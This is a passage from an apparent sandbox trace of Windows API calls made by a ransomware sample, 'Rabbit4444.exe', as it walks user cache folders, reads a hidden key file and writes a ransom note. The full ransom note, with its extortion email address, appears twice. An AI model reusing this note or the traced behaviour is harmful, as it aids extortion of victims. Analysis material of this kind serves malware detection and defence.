dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.737] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.737] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.737] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee18ec18, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee18ec18, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee1db3fe, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.737] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0061.737] lstrcpyW (in: lpString1=0x11cec26, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.737] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.737] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.737] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.738] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.738] CloseHandle (hObject=0x29c) returned 1 [0061.738] CloseHandle (hObject=0x2a0) returned 1 [0061.738] GetCurrentThreadId () returned 0x2d4 [0061.738] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x0 [0061.738] GetCurrentThreadId () returned 0x2d4 [0061.738] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce288*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0061.738] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x0 [0061.738] RtlInterlockedFlushSList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x0 [0061.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0061.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff3d8 | out: hHeap=0xe0000) returned 1 [0061.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0061.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0061.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123038 | out: hHeap=0xe0000) returned 1 Thread: id = 18 os_tid = 0xd44 [0061.890] RtlInterlockedPopEntrySList (in: ListHead=0x122208 | out: ListHead=0x122208) returned 0x122268 [0061.893] lstrcpynW (in: lpString1=0x11cec48, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" [0061.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123a68 | out: hHeap=0xe0000) returned 1 [0061.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0061.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" [0061.909] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\" [0061.911] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0061.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0061.913] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache" [0061.913] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\" [0061.917] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0061.919] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.920] ReadFile (in: hFile=0x2a0, lpBuffer=0x11cc830, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc82c, lpOverlapped=0x0 | out: lpBuffer=0x11cc830*, lpNumberOfBytesRead=0x11cc82c*=0x3d4, lpOverlapped=0x0) returned 1 [0061.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x1055b0 [0061.925] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123138 [0061.928] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0061.929] lstrlenA (lpString="{{ID}}") returned 6 [0061.932] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0061.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x124d90 [0061.932] CloseHandle (hObject=0x2a0) returned 1 [0061.936] GetLastError () returned 0x0 [0061.936] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache") returned 85 [0061.936] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.936] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x11ce0f8 | out: lpFindFileData=0x11ce0f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26377f6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0061.937] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.937] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.937] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.937] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.937] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce0f8 | out: lpFindFileData=0x11ce0f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf68a8755, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd26377f6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xedd88d24, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.944] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.946] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.951] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.953] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.954] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.954] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce0f8 | out: lpFindFileData=0x11ce0f8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd88d24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd88d24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddaef41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.962] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.962] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.962] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce0f8 | out: lpFindFileData=0x11ce0f8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xedd88d24, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xedd88d24, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeddaef41, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.964] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0061.964] lstrcpyW (in: lpString1=0x11cecf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.ZuneVideo_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.zunevideo_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.978] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.979] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.010] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.020] CloseHandle (hObject=0x29c) returned 1 [0062.021] CloseHandle (hObject=0x2a0) returned 1 [0062.021] GetCurrentThreadId () returned 0xd44 [0062.021] RtlInterlockedPopEntrySList (in: ListHead=0x122208 | out: ListHead=0x122208) returned 0x0 [0062.021] GetCurrentThreadId () returned 0xd44 [0062.021] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce348*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0062.022] RtlInterlockedPopEntrySList (in: ListHead=0x122208 | out: ListHead=0x122208) returned 0x0 [0062.022] RtlInterlockedFlushSList (in: ListHead=0x122208 | out: ListHead=0x122208) returned 0x0 [0062.027] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0062.030] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff3d8 | out: hHeap=0xe0000) returned 1 [0062.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0062.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123138 | out: hHeap=0xe0000) returned 1 Thread: id = 19 os_tid = 0xb08 [0062.554] RtlInterlockedPopEntrySList (in: ListHead=0x122308 | out: ListHead=0x122308) returned 0x1222e8 [0062.554] lstrcpynW (in: lpString1=0x11ce9a8, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0062.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116520 | out: hHeap=0xe0000) returned 1 [0062.555] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0062.558] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0062.561] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\" [0062.562] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0062.562] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0062.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0062.574] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\" [0062.574] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0062.574] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.581] ReadFile (in: hFile=0x298, lpBuffer=0x11cc590, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc58c, lpOverlapped=0x0 | out: lpBuffer=0x11cc590*, lpNumberOfBytesRead=0x11cc58c*=0x3d4, lpOverlapped=0x0) returned 1 [0062.589] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x1055b0 [0062.589] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.589] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0062.598] lstrlenA (lpString="{{ID}}") returned 6 [0062.598] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0062.598] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x122840 [0062.598] CloseHandle (hObject=0x298) returned 1 [0062.598] GetLastError () returned 0x0 [0062.598] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned 99 [0062.598] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.600] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x11cde58 | out: lpFindFileData=0x11cde58*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.603] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.604] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.604] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.604] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.604] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cde58 | out: lpFindFileData=0x11cde58*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, 